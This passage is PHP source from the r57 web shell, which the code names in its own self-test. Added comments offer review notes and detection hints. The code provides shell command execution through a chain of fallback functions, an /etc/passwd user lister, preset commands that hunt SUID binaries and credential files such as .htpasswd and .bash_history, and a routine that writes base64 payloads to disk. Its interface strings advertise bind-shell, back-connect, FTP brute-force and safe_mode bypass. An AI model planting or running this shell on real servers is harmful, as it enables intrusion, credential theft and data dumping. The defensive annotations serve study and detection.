691 {
692 $r = '';
693 echo '<table width=100%>', '<tr><td bgcolor=#cccccc><font face=Verdana size=-2 color=red><div align=center><b>Directive</b></div></font></td><td bgcolor=#cccccc><font face=Verdana size=-2 color=red><div align=center><b>Local Value</b></div></font></td><td bgcolor=#cccccc><font face=Verdana size=-2 color=red><div align=center><b>Master Value</b></div></font></td></tr>';
 // ws() is defined outside this chunk. Directive names are written unescaped;
 // values go through U_value().
694 foreach (@ini_get_all() as $key=>$value)
695 {
696 $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.$key.'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.U_value($value['local_value']).'</b></div></font></td><td><font face=Verdana size=-2><div align=center><b>'.U_value($value['global_value']).'</b></div></font></td></tr>';
697 }
698 echo $r;
699 echo '</table>';
700 }
701echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
702die();
703}
// Request handler: GET ?cpu - prints the lines of a file named "cpuinfo" as a
// two-column table (text before ':' / text after ':'), then stops.
// The file name is relative, so it is resolved against the current working
// directory; which directory that is at this point is not visible in this chunk.
// File contents are written into the page without HTML escaping.
704if(isset($_GET['cpu']))
705 {
706 echo $head;
707 echo '<table width=100%><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2 color=red><b>CPU</b></font></div></td></tr></table><table width=100%>';
708 $cpuf = @file("cpuinfo");
709 if($cpuf)
710 {
711 $c = @sizeof($cpuf);
712 for($i=0;$i<$c;$i++)
713 {
714 $info = @explode(":",$cpuf[$i]);
 // Lines without a value after ':' get a '---' placeholder.
715 if($info[1]==""){ $info[1]="---"; }
 // $r is appended to without prior initialisation in this branch.
716 $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.trim($info[0]).'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>';
717 }
718 echo $r;
719 }
720 else
721 {
722 echo '<tr><td>'.ws(3).'<div align=center><font face=Verdana size=-2><b> --- </b></font></div></td></tr>';
723 }
724 echo '</table>';
725 echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
726 die();
727 }
// Request handler: GET ?mem - same layout as the ?cpu view, reading a file named
// "meminfo" instead. The name is relative to the current working directory, and
// the file contents are written into the page without HTML escaping.
728if(isset($_GET['mem']))
729 {
730 echo $head;
731 echo '<table width=100%><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2 color=red><b>MEMORY</b></font></div></td></tr></table><table width=100%>';
732 $memf = @file("meminfo");
733 if($memf)
734 {
735 $c = sizeof($memf);
736 for($i=0;$i<$c;$i++)
737 {
738 $info = explode(":",$memf[$i]);
 // Lines without a value after ':' get a '---' placeholder.
739 if($info[1]==""){ $info[1]="---"; }
 // $r is appended to without prior initialisation in this branch.
740 $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.trim($info[0]).'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>';
741 }
742 echo $r;
743 }
744 else
745 {
746 echo '<tr><td>'.ws(3).'<div align=center><font face=Verdana size=-2><b> --- </b></font></div></td></tr>';
747 }
748 echo '</table>';
749 echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
750 die();
751 }
752$lang=array(
753'ru_text1' =>'??????????? ???????',
754'ru_text2' =>'?????????? ?????? ?? ???????',
755'ru_text3' =>'????????? ???????',
756'ru_text4' =>'??????? ??????????',
757'ru_text5' =>'???????? ?????? ?? ??????',
758'ru_text6' =>'????????? ????',
759'ru_text7' =>'??????',
760'ru_text8' =>'???????? ?????',
761'ru_butt1' =>'?????????',
762'ru_butt2' =>'?????????',
763'ru_text9' =>'???????? ????? ? ???????? ??? ? /bin/bash',
764'ru_text10'=>'??????? ????',
765'ru_text11'=>'?????? ??? ???????',
766'ru_butt3' =>'???????',
767'ru_text12'=>'back-connect',
768'ru_text13'=>'IP-?????',
769'ru_text14'=>'????',
770'ru_butt4' =>'?????????',
771'ru_text15'=>'???????? ?????? ? ?????????? ???????',
772'ru_text16'=>'????????????',
773'ru_text17'=>'????????? ????',
774'ru_text18'=>'????????? ????',
775'ru_text19'=>'Exploits',
776'ru_text20'=>'????????????',
777'ru_text21'=>'????? ???',
778'ru_text22'=>'datapipe',
779'ru_text23'=>'????????? ????',
780'ru_text24'=>'????????? ????',
781'ru_text25'=>'????????? ????',
782'ru_text26'=>'????????????',
783'ru_butt5' =>'?????????',
784'ru_text28'=>'?????? ? safe_mode',
785'ru_text29'=>'?????? ????????',
786'ru_butt6' =>'???????',
787'ru_text30'=>'???????? ?????',
788'ru_butt7' =>'???????',
789'ru_text31'=>'???? ?? ??????',
790'ru_text32'=>'?????????? PHP ????',
791'ru_text33'=>'???????? ??????????? ?????? ??????????? open_basedir ????? ??????? cURL',
792'ru_butt8' =>'?????????',
793'ru_text34'=>'???????? ??????????? ?????? ??????????? safe_mode ????? ??????? include',
794'ru_text35'=>'???????? ??????????? ?????? ??????????? safe_mode ????? ???????? ????? ? mysql',
795'ru_text36'=>'???? . ???????',
796'ru_text37'=>'?????',
797'ru_text38'=>'??????',
798'ru_text39'=>'????',
799'ru_text40'=>'???? ??????? ???? ??????',
800'ru_butt9' =>'????',
801'ru_text41'=>'????????? ? ?????',
802'ru_text42'=>'?????????????? ?????',
803'ru_text43'=>'????????????? ????',
804'ru_butt10'=>'?????????',
805'ru_butt11'=>'?????????????',
806'ru_text44'=>'?????????????? ????? ??????????! ?????? ?????? ??? ??????!',
807'ru_text45'=>'???? ????????',
808'ru_text46'=>'???????? phpinfo()',
809'ru_text47'=>'???????? ???????? php.ini',
810'ru_text48'=>'???????? ????????? ??????',
811'ru_text49'=>'???????? ??????? ? ???????',
812'ru_text50'=>'?????????? ? ??????????',
813'ru_text51'=>'?????????? ? ??????',
814'ru_text52'=>'????? ??? ??????',
815'ru_text53'=>'?????? ? ?????',
816'ru_text54'=>'????? ?????? ? ??????',
817'ru_butt12'=>'?????',
818'ru_text55'=>'?????? ? ??????',
819'ru_text56'=>'?????? ?? ???????',
820'ru_text57'=>'???????/??????? ????/??????????',
821'ru_text58'=>'???',
822'ru_text59'=>'????',
823'ru_text60'=>'??????????',
824'ru_butt13'=>'???????/???????',
825'ru_text61'=>'???? ??????',
826'ru_text62'=>'?????????? ???????',
827'ru_text63'=>'???? ??????',
828'ru_text64'=>'?????????? ???????',
829'ru_text65'=>'???????',
830'ru_text66'=>'???????',
831'ru_text67'=>'Chown/Chgrp/Chmod',
832'ru_text68'=>'???????',
833'ru_text69'=>'????????1',
834'ru_text70'=>'????????2',
835'ru_text71'=>"?????? ???????? ???????:\r\n- ??? CHOWN - ??? ?????? ???????????? ??? ??? UID (??????) \r\n- ??? ??????? CHGRP - ??? ?????? ??? GID (??????) \r\n- ??? ??????? CHMOD - ????? ????? ? ???????????? ????????????? (???????? 0777)",
836'ru_text72'=>'????? ??? ??????',
837'ru_text73'=>'?????? ? ?????',
838'ru_text74'=>'?????? ? ??????',
839'ru_text75'=>'* ????? ???????????? ?????????? ?????????',
840'ru_text76'=>'????? ?????? ? ?????? ? ??????? ??????? find',
841'ru_text80'=>'???',
842'ru_text81'=>'????',
843'ru_text82'=>'???? ??????',
844'ru_text83'=>'?????????? SQL ???????',
845'ru_text84'=>'SQL ??????',
846'ru_text85'=>'???????? ??????????? ?????? ??????????? safe_mode ????? ?????????? ?????? ? MSSQL ???????',
847'ru_text86'=>'?????????? ????? ? ???????',
848'ru_butt14'=>'???????',
849'ru_text87'=>'?????????? ?????? ? ?????????? ftp-???????',
850'ru_text88'=>'FTP-??????:????',
851'ru_text89'=>'???? ?? ftp ???????',
852'ru_text90'=>'????? ????????',
853'ru_text91'=>'???????????? ?',
854'ru_text92'=>'??? ?????????',
855'ru_text93'=>'FTP',
856'ru_text94'=>'FTP-????????',
857'ru_text95'=>'?????? ?????????????',
858'ru_text96'=>'?? ??????? ???????? ?????? ?????????????',
859'ru_text97'=>'????????? ??????????: ',
860'ru_text98'=>'??????? ???????????: ',
861'ru_text99'=>'* ? ???????? ?????? ? ?????? ???????????? ??? ???????????? ?? /etc/passwd',
862'ru_text100'=>'???????? ?????? ?? ????????? ??? ??????',
863'ru_text101'=>'???????????? ????? ???????????? (user -> resu) ??? ???????????? ? ???????? ??????',
864'ru_text102'=>'?????',
865'ru_text103'=>'???????? ??????',
866'ru_text104'=>'???????? ????? ?? ???????? ????',
867'ru_text105'=>'????',
868'ru_text106'=>'??',
869'ru_text107'=>'????',
870'ru_butt15'=>'?????????',
871'ru_text108'=>'????? ??????',
872'ru_text109'=>'????????',
873'ru_text110'=>'??????????',
874'ru_text111'=>'SQL-?????? : ????',
875'ru_text112'=>'???????? ??????????? ?????? ??????????? safe_mode ????? ????????????? ??????? mb_send_mail',
876'ru_text113'=>'???????? ??????????? ?????? ??????????? safe_mode, ???????? ???????? ?????????? ? ?????????????? imap_list',
877'ru_text114'=>'???????? ??????????? ?????? ??????????? safe_mode, ???????? ??????????? ????? ? ?????????????? imap_body',
878'ru_text115'=>'???????? ??????????? ?????? ??????????? safe_mode, ??????????? ?????? ? compress.zlib:// ? copy()',
879'ru_text116'=>'?????????? ????',
880'ru_text117'=>'?',
881'ru_text118'=>'???? ??????????',
882'ru_text119'=>'?? ??????? ??????????? ????',
883'ru_err0'=>'??????! ?? ???? ???????? ? ???? ',
884'ru_err1'=>'??????! ?? ???? ????????? ???? ',
885'ru_err2'=>'??????! ?? ??????? ??????? ',
886'ru_err3'=>'??????! ?? ??????? ???????????? ? ftp ???????',
887'ru_err4'=>'?????? ??????????? ?? ftp ???????',
888'ru_err5'=>'??????! ?? ??????? ???????? ?????????? ?? ftp ???????',
889'ru_err6'=>'??????! ?? ??????? ????????? ??????',
890'ru_err7'=>'?????? ??????????',
891/* --------------------------------------------------------------- */
892'eng_text1' =>'Executed command',
893'eng_text2' =>'Execute command on server',
894'eng_text3' =>'Run command',
895'eng_text4' =>'Work directory',
896'eng_text5' =>'Upload files on server',
897'eng_text6' =>'Local file',
898'eng_text7' =>'Aliases',
899'eng_text8' =>'Select alias',
900'eng_butt1' =>'Execute',
901'eng_butt2' =>'Upload',
902'eng_text9' =>'Bind port to /bin/bash',
903'eng_text10'=>'Port',
904'eng_text11'=>'Password for access',
905'eng_butt3' =>'Bind',
906'eng_text12'=>'back-connect',
907'eng_text13'=>'IP',
908'eng_text14'=>'Port',
909'eng_butt4' =>'Connect',
910'eng_text15'=>'Upload files from remote server',
911'eng_text16'=>'With',
912'eng_text17'=>'Remote file',
913'eng_text18'=>'Local file',
914'eng_text19'=>'Exploits',
915'eng_text20'=>'Use',
916'eng_text21'=>' New name',
917'eng_text22'=>'datapipe',
918'eng_text23'=>'Local port',
919'eng_text24'=>'Remote host',
920'eng_text25'=>'Remote port',
921'eng_text26'=>'Use',
922'eng_butt5' =>'Run',
923'eng_text28'=>'Work in safe_mode',
924'eng_text29'=>'ACCESS DENIED',
925'eng_butt6' =>'Change',
926'eng_text30'=>'Cat file',
927'eng_butt7' =>'Show',
928'eng_text31'=>'File not found',
929'eng_text32'=>'Eval PHP code',
930'eng_text33'=>'Test bypass open_basedir with cURL functions',
931'eng_butt8' =>'Test',
932'eng_text34'=>'Test bypass safe_mode with include function',
933'eng_text35'=>'Test bypass safe_mode with load file in mysql',
934'eng_text36'=>'Database . Table',
935'eng_text37'=>'Login',
936'eng_text38'=>'Password',
937'eng_text39'=>'Database',
938'eng_text40'=>'Dump database table',
939'eng_butt9' =>'Dump',
940'eng_text41'=>'Save dump in file',
941'eng_text42'=>'Edit files',
942'eng_text43'=>'File for edit',
943'eng_butt10'=>'Save',
944'eng_text44'=>'Can\'t edit file! Only read access!',
945'eng_text45'=>'File saved',
946'eng_text46'=>'Show phpinfo()',
947'eng_text47'=>'Show variables from php.ini',
948'eng_text48'=>'Delete temp files',
949'eng_butt11'=>'Edit file',
950'eng_text49'=>'Delete script from server',
951'eng_text50'=>'View cpu info',
952'eng_text51'=>'View memory info',
953'eng_text52'=>'Find text',
954'eng_text53'=>'In dirs',
955'eng_text54'=>'Find text in files',
956'eng_butt12'=>'Find',
957'eng_text55'=>'Only in files',
958'eng_text56'=>'Nothing :(',
959'eng_text57'=>'Create/Delete File/Dir',
960'eng_text58'=>'name',
961'eng_text59'=>'file',
962'eng_text60'=>'dir',
963'eng_butt13'=>'Create/Delete',
964'eng_text61'=>'File created',
965'eng_text62'=>'Dir created',
966'eng_text63'=>'File deleted',
967'eng_text64'=>'Dir deleted',
968'eng_text65'=>'Create',
969'eng_text66'=>'Delete',
970'eng_text67'=>'Chown/Chgrp/Chmod',
971'eng_text68'=>'Command',
972'eng_text69'=>'param1',
973'eng_text70'=>'param2',
974'eng_text71'=>"Second commands param is:\r\n- for CHOWN - name of new owner or UID\r\n- for CHGRP - group name or GID\r\n- for CHMOD - 0777, 0755...",
975'eng_text72'=>'Text for find',
976'eng_text73'=>'Find in folder',
977'eng_text74'=>'Find in files',
978'eng_text75'=>'* you can use regexp',
979'eng_text76'=>'Search text in files via find',
980'eng_text80'=>'Type',
981'eng_text81'=>'Net',
982'eng_text82'=>'Databases',
983'eng_text83'=>'Run SQL query',
984'eng_text84'=>'SQL query',
985'eng_text85'=>'Test bypass safe_mode with commands execute via MSSQL server',
986'eng_text86'=>'Download files from server',
987'eng_butt14'=>'Download',
988'eng_text87'=>'Download files from remote ftp-server',
989'eng_text88'=>'FTP-server:port',
990'eng_text89'=>'File on ftp',
991'eng_text90'=>'Transfer mode',
992'eng_text91'=>'Archivation',
993'eng_text92'=>'without archivation',
994'eng_text93'=>'FTP',
995'eng_text94'=>'FTP-bruteforce',
996'eng_text95'=>'Users list',
997'eng_text96'=>'Can\'t get users list',
998'eng_text97'=>'checked: ',
999'eng_text98'=>'success: ',
1000'eng_text99'=>'* use username from /etc/passwd for ftp login and password',
1001'eng_text100'=>'Send file to remote ftp server',
1002'eng_text101'=>'Use reverse (user -> resu) login for password',
1003'eng_text102'=>'Mail',
1004'eng_text103'=>'Send email',
1005'eng_text104'=>'Send file to email',
1006'eng_text105'=>'To',
1007'eng_text106'=>'From',
1008'eng_text107'=>'Subj',
1009'eng_butt15'=>'Send',
1010'eng_text108'=>'Mail',
1011'eng_text109'=>'Hide',
1012'eng_text110'=>'Show',
1013'eng_text111'=>'SQL-Server : Port',
1014'eng_text112'=>'Test bypass safe_mode with function mb_send_mail',
1015'eng_text113'=>'Test bypass safe_mode, view dir list via imap_list',
1016'eng_text114'=>'Test bypass safe_mode, view file contest via imap_body',
1017'eng_text115'=>'Test bypass safe_mode, copy file via compress.zlib:// in function copy()',
1018'eng_text116'=>'Copy from',
1019'eng_text117'=>'to',
1020'eng_text118'=>'File copied',
1021'eng_text119'=>'Cant copy file',
1022'eng_err0'=>'Error! Can\'t write in file ',
1023'eng_err1'=>'Error! Can\'t read file ',
1024'eng_err2'=>'Error! Can\'t create ',
1025'eng_err3'=>'Error! Can\'t connect to ftp',
1026'eng_err4'=>'Error! Can\'t login on ftp server',
1027'eng_err5'=>'Error! Can\'t change dir on ftp',
1028'eng_err6'=>'Error! Can\'t sent mail',
1029'eng_err7'=>'Mail send',
1030);
1031/*
1032?????? ??????
1033????????? ???????? ????????????? ?????? ????? ? ???-?? ??????. ( ??????? ????????? ???? ????????? ???? )
1034?? ?????? ???? ????????? ??? ???????? ???????.
1035*/
// Preset shell commands, keyed by the label shown to the operator (label => command line).
// Review note: every entry is host reconnaissance: SUID/SGID binaries, world-writable
// files and directories, configuration and credential files (.htpasswd, service.pwd,
// .bash_history, .mysql_history, .fetchmailrc), file attributes and listening ports.
// For defenders: the web-server account spawning `find / ... -perm -04000`, or searching
// the whole filesystem for .htpasswd or history files, is a strong process-telemetry
// signal that a web shell is in use.
1036$aliases=array(
1037'find suid files'=>'find / -type f -perm -04000 -ls',
1038'find suid files in current dir'=>'find . -type f -perm -04000 -ls',
1039'find sgid files'=>'find / -type f -perm -02000 -ls',
1040'find sgid files in current dir'=>'find . -type f -perm -02000 -ls',
1041'find config.inc.php files'=>'find / -type f -name config.inc.php',
1042'find config.inc.php files in current dir'=>'find . -type f -name config.inc.php',
1043'find config* files'=>'find / -type f -name "config*"',
1044'find config* files in current dir'=>'find . -type f -name "config*"',
1045'find all writable files'=>'find / -type f -perm -2 -ls',
1046'find all writable files in current dir'=>'find . -type f -perm -2 -ls',
1047'find all writable directories'=>'find / -type d -perm -2 -ls',
1048'find all writable directories in current dir'=>'find . -type d -perm -2 -ls',
1049'find all writable directories and files'=>'find / -perm -2 -ls',
1050'find all writable directories and files in current dir'=>'find . -perm -2 -ls',
1051'find all service.pwd files'=>'find / -type f -name service.pwd',
1052'find service.pwd files in current dir'=>'find . -type f -name service.pwd',
1053'find all .htpasswd files'=>'find / -type f -name .htpasswd',
1054'find .htpasswd files in current dir'=>'find . -type f -name .htpasswd',
1055'find all .bash_history files'=>'find / -type f -name .bash_history',
1056'find .bash_history files in current dir'=>'find . -type f -name .bash_history',
1057'find all .mysql_history files'=>'find / -type f -name .mysql_history',
1058'find .mysql_history files in current dir'=>'find . -type f -name .mysql_history',
1059'find all .fetchmailrc files'=>'find / -type f -name .fetchmailrc',
1060'find .fetchmailrc files in current dir'=>'find . -type f -name .fetchmailrc',
1061'list file attributes on a Linux second extended file system'=>'lsattr -va',
1062'show opened ports'=>'netstat -an | grep -i listen',
1063'----------------------------------------------------------------------------------------------------'=>'ls -la'
1064);
// Reusable HTML fragments (table rows, bracket decorations, font/table/form wrappers)
// that the rest of the script concatenates into the pages it prints.
1065$table_up1 = "<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b><div align=center>:: ";
1066$table_up2 = " ::</div></b></font></td></tr><tr><td>";
1067$table_up3 = "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc>";
1068$table_end1 = "</td></tr>";
1069$arrow = " <font face=Webdings color=gray>4</font>";
1070$lb = "<font color=black>[</font>";
1071$rb = "<font color=black>]</font>";
1072$font = "<font face=Verdana size=-2>";
1073$ts = "<table class=table1 width=100% align=center>";
1074$te = "</table>";
// Every form posts back to the script's own URL (no action attribute).
1075$fs = "<form name=form method=POST>";
1076$fe = "</form>";
1077
// Handler for the `users` query parameter: prints the account names returned by
// get_users() (or the "can't get users list" message) and stops the script.
// Review note: $_SERVER['PHP_SELF'] and the account names are echoed without HTML
// encoding. For defenders: requests to an unexpected PHP file carrying a bare `users`
// query string are worth alerting on in web access logs.
1078if(isset($_GET['users']))
1079 {
1080 if(!$users=get_users()) { echo "<center><font face=Verdana size=-2 color=red>".$lang[$language.'_text96']."</font></center>"; }
1081 else
1082 {
1083 echo '<center>';
1084 foreach($users as $user) { echo $user."<br>"; }
1085 echo '</center>';
1086 }
1087 echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die();
1088 }
1089
// Working-directory selection and platform detection.
// The POST field `dir` is handed to chdir() as-is; the only limits on where the script
// can go are the filesystem permissions and PHP settings of the web-server account.
1090if (!empty($_POST['dir'])) { @chdir($_POST['dir']); }
1091$dir = @getcwd();
1092$unix = 0;
// A ":" as second character of the working directory (drive letter) means Windows;
// anything else is treated as Unix.
1093if(strlen($dir)>1 && $dir[1]==":") $unix=0; else $unix=1;
// Fallback when getcwd() returned nothing: decide from the OS environment variable,
// then php_uname(); with neither available, assume Unix.
1094if(empty($dir))
1095 {
1096 $os = getenv('OS');
1097 if(empty($os)){ $os = php_uname(); }
1098 if(empty($os)){ $os ="-"; $unix=1; }
1099 else
1100 {
// eregi() was removed in PHP 7; the @ only hides warnings, it does not make the call work there.
1101 if(@eregi("^win",$os)) { $unix = 0; }
1102 else { $unix = 1; }
1103 }
1104 }
// Handler for POST cmd=search_text: searches the directories in s_dir for s_text
// (optionally limited to the extensions in s_mask when m is set), prints the matching
// lines grouped by file, and stops the script.
// Review note: the directory list, the search text and the extension filter all come
// straight from the request. For defenders: POST bodies with cmd=search_text together
// with s_dir/s_text fields are a request signature for this script.
1105if(!empty($_POST['s_dir']) && !empty($_POST['s_text']) && !empty($_POST['cmd']) && $_POST['cmd'] == "search_text")
1106 {
1107 echo $head;
1108 if(!empty($_POST['s_mask']) && !empty($_POST['m'])) { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text'],$_POST['s_mask']); }
1109 else { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text']); }
// Arguments are (phrase=0, case=0): no word-boundary wrapping, case-insensitive match.
1110 $sr->SearchText(0,0);
1111 $res = $sr->GetResultFiles();
1112 $found = $sr->GetMatchesCount();
1113 $titles = $sr->GetTitles();
1114 $r = "";
1115 if($found > 0)
1116 {
1117 $r .= "<TABLE width=100%>";
// $res maps file name => (line number => highlighted line text).
1118 foreach($res as $file=>$v)
1119 {
1120 $r .= "<TR>";
1121 $r .= "<TD colspan=2><font face=Verdana size=-2><b>".ws(3);
// Show backslash-separated paths on Windows.
1122 $r .= (!$unix)? str_replace("/","\\",$file) : $file;
1123 $r .= "</b></font></ TD>";
1124 $r .= "</TR>";
1125 foreach($v as $a=>$b)
1126 {
1127 $r .= "<TR>";
1128 $r .= "<TD align=center><B><font face=Verdana size=-2>".$a."</font></B></TD>";
1129 $r .= "<TD><font face=Verdana size=-2>".ws(2).$b."</font></TD>";
1130 $r .= "</TR>\n";
1131 }
1132 }
1133 $r .= "</TABLE>";
1134 echo $r;
1135 }
1136 else
1137 {
1138 echo "<P align=center><B><font face=Verdana size=-2>".$lang[$language.'_text56']."</B></font></P>";
1139 }
1140 echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
1141 die();
1142 }
// Command-execution self-test: runs `echo abcr57` through ex() and expects "r57" at
// offset 3 of the output; any other result switches the script into its safe_mode
// code paths.
// For defenders: the literal command `echo abcr57` executed by the web-server account is
// a process-level indicator that this script has been loaded.
1143if(!$safe_mode && strpos(ex("echo abcr57"),"r57")!=3) { $safe_mode = 1; }
// Server banner from the environment, "-" when unavailable.
1144$SERVER_SOFTWARE = getenv('SERVER_SOFTWARE');
1145if(empty($SERVER_SOFTWARE)){ $SERVER_SOFTWARE = "-"; }
/**
 * Returns the spacer string repeated $i times; used as horizontal padding in the HTML
 * output. Errors from str_repeat() are suppressed with @.
 */
1146function ws($i)
1147{
1148return @str_repeat(" ",$i);
1149}
/**
 * Runs a shell command and returns its output as a string.
 *
 * Uses the first available of exec(), shell_exec(), system(), passthru() and, last,
 * popen(). All errors are suppressed with @. Returns '' when $cfe is empty or when no
 * method produced output.
 *
 * Review note: $cfe is passed to the shell unmodified. Because of the fallback chain,
 * disabling only one or two of these functions does not stop the script; hardening has
 * to cover all five in disable_functions (and the web-server account should not be able
 * to spawn shells at all where that is feasible).
 */
1150function ex($cfe)
1151{
1152 $res = '';
1153 if (!empty($cfe))
1154 {
1155 if(function_exists('exec'))
1156 {
// exec() fills $res with an array of output lines, joined back into one string below.
1157 @exec($cfe,$res);
1158 $res = join("\n",$res);
1159 }
1160 elseif(function_exists('shell_exec'))
1161 {
1162 $res = @shell_exec($cfe);
1163 }
1164 elseif(function_exists('system'))
1165 {
// system() and passthru() print directly, so their output is captured with output buffering.
1166 @ob_start();
1167 @system($cfe);
1168 $res = @ob_get_contents();
1169 @ob_end_clean();
1170 }
1171 elseif(function_exists('passthru'))
1172 {
1173 @ob_start();
1174 @passthru($cfe);
1175 $res = @ob_get_contents();
1176 @ob_end_clean();
1177 }
// Last resort: read the command's stdout through a pipe in 1024-byte chunks.
1178 elseif(@is_resource($f = @popen($cfe,"r")))
1179 {
1180 $res = "";
1181 while(!@feof($f)) { $res .= @fread($f,1024); }
1182 @pclose($f);
1183 }
1184 }
1185 return $res;
1186}
/**
 * Returns the account names listed in /etc/passwd.
 *
 * Takes the first colon-separated field of every line that does not start with '#'.
 * Returns 0 (not an empty array) when file() yields nothing.
 *
 * Review note: the file() call is not @-suppressed, so an unreadable /etc/passwd
 * (for example under an open_basedir restriction) raises a PHP warning that can show
 * up in the error log.
 */
1187function get_users()
1188{
1189 $users = array();
1190 $rows=file('/etc/passwd');
1191 if(!$rows) return 0;
1192 foreach ($rows as $string)
1193 {
1194 $user = @explode(":",$string);
1195 if(substr($string,0,1)!='#') array_push($users,$user[0]);
1196 }
1197 return $users;
1198}
/**
 * Prints error message number $n in the active interface language inside a red banner,
 * followed by $txt when given. Always returns null.
 *
 * The message is looked up as $GLOBALS['lang'][<language>_err<n>]; $txt is echoed
 * without HTML encoding.
 */
1199function err($n,$txt='')
1200{
1201echo '<table width=100% cellpadding=0 cellspacing=0><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>';
1202echo $GLOBALS['lang'][$GLOBALS['language'].'_err'.$n];
1203if(!empty($txt)) { echo " $txt"; }
1204echo '</b></div></font></td></tr></table>';
1205return null;
1206}
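/**
 * Formats a numeric file mode as an ls-style string such as "drwxr-xr-x".
 *
 * @param int $mode Mode bits, e.g. the value returned by fileperms().
 * @return string|int Ten-character type-and-permission string, or 0 when
 *                    $GLOBALS['unix'] is falsy (the script's non-Unix flag).
 */
function perms($mode)
{
    if (!$GLOBALS['unix']) return 0;

    // The file type is an enumerated value in the top four bits, not a set of
    // independent flags, so it is masked and compared for equality. Testing single bits
    // one after another reported symlinks and block devices as 'c' and sockets as 'd'.
    switch ($mode & 0xF000) {
        case 0x1000: $type = 'p'; break; // FIFO
        case 0x2000: $type = 'c'; break; // character device
        case 0x4000: $type = 'd'; break; // directory
        case 0x6000: $type = 'b'; break; // block device
        case 0x8000: $type = '-'; break; // regular file
        case 0xA000: $type = 'l'; break; // symbolic link
        case 0xC000: $type = 's'; break; // socket
        default:     $type = 'u';        // unknown
    }

    $owner = array(
        'read'    => ($mode & 00400) ? 'r' : '-',
        'write'   => ($mode & 00200) ? 'w' : '-',
        'execute' => ($mode & 00100) ? 'x' : '-',
    );
    $group = array(
        'read'    => ($mode & 00040) ? 'r' : '-',
        'write'   => ($mode & 00020) ? 'w' : '-',
        'execute' => ($mode & 00010) ? 'x' : '-',
    );
    $world = array(
        'read'    => ($mode & 00004) ? 'r' : '-',
        'write'   => ($mode & 00002) ? 'w' : '-',
        'execute' => ($mode & 00001) ? 'x' : '-',
    );

    // setuid / setgid / sticky replace the execute column: lower case when the execute
    // bit is also set, upper case when it is not.
    if ($mode & 0x800) $owner['execute'] = ($owner['execute'] == 'x') ? 's' : 'S';
    if ($mode & 0x400) $group['execute'] = ($group['execute'] == 'x') ? 's' : 'S';
    if ($mode & 0x200) $world['execute'] = ($world['execute'] == 'x') ? 't' : 'T';

    $s  = sprintf("%1s", $type);
    $s .= sprintf("%1s%1s%1s", $owner['read'], $owner['write'], $owner['execute']);
    $s .= sprintf("%1s%1s%1s", $group['read'], $group['write'], $group['execute']);
    $s .= sprintf("%1s%1s%1s", $world['read'], $world['write'], $world['execute']);
    return trim($s);
}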
/**
 * Builds an HTML <input> tag.
 *
 * @param string $type    Value of the type attribute.
 * @param string $name    Value of the name attribute.
 * @param mixed  $size    Value of the size attribute; left out when it compares equal to 0.
 * @param string $value   Value of the value attribute (placed in double quotes, not HTML-encoded).
 * @param mixed  $checked Truthy to append the bare "checked" attribute.
 * @return string The tag markup.
 */
function in($type,$name,$size,$value,$checked=0)
{
    $sizeAttr = "";
    if ($size != 0) {
        $sizeAttr = "size=".$size." ";
    }
    $checkedAttr = $checked ? " checked" : "";

    return "<input type=".$type." name=".$name." ".$sizeAttr."value=\"".$value."\"".$checkedAttr.">";
}
/**
 * Resolves a program name to a path by running `which <name>` through ex().
 * Returns the command output when non-empty, otherwise $pr unchanged.
 *
 * Review note: $pr is interpolated into the command line without escaping.
 */
1244function which($pr)
1245{
1246$path = ex("which $pr");
1247if(!empty($path)) { return $path; } else { return $pr; }
1248}
/**
 * Writes the base64-decoded form of $text to the file $fname, truncating it first.
 * When the file cannot be opened, err(0) prints the "can't write in file" message and
 * nothing is written.
 *
 * Review note: presumably this is how the base64 blobs defined in this file
 * ($port_bind_bd_c, $back_connect, $datapipe_c, ...) are dropped to disk; the call
 * sites are outside this excerpt. For defenders: new .c/.pl-style files created by the
 * web-server account in writable directories are a file-integrity signal.
 */
1249function cf($fname,$text)
1250{
1251 $w_file=@fopen($fname,"w") or err(0);
1252 if($w_file)
1253 {
1254 @fputs($w_file,@base64_decode($text));
1255 @fclose($w_file);
1256 }
1257}
/**
 * Builds one two-cell table row: a right-aligned label cell of width $l percent
 * followed by a left-aligned content cell. Neither text is HTML-encoded.
 */
function sr($l,$t1,$t2)
{
    $labelCell   = "<td class=td1 width=".$l."% align=right>".$t1."</td>";
    $contentCell = "<td class=td1 align=left>".$t2."</td>";

    return "<tr class=tr1>".$labelCell.$contentCell."</tr>";
}
// Defined only when no function of that name exists yet.
if (!@function_exists("view_size"))
{
    /**
     * Formats a byte count with a binary unit suffix (B, KB, MB, GB), rounded to two
     * decimal places for KB and above.
     */
    function view_size($size)
    {
        // Largest unit first; the first threshold the size reaches wins.
        $units = array(
            array(1073741824, " GB"),
            array(1048576, " MB"),
            array(1024, " KB"),
        );
        foreach ($units as $unit)
        {
            if ($size >= $unit[0])
            {
                return (@round($size / $unit[0] * 100) / 100) . $unit[1];
            }
        }
        return $size . " B";
    }
}
/**
 * Recursively collects the paths of all files below $dir.
 *
 * @param string $dir   Directory to walk; unreadable directories are silently skipped.
 * @param string $types Optional ';'-separated list of extensions including the dot
 *                      (compared against the text from the last '.' of the file name);
 *                      empty means every file is returned.
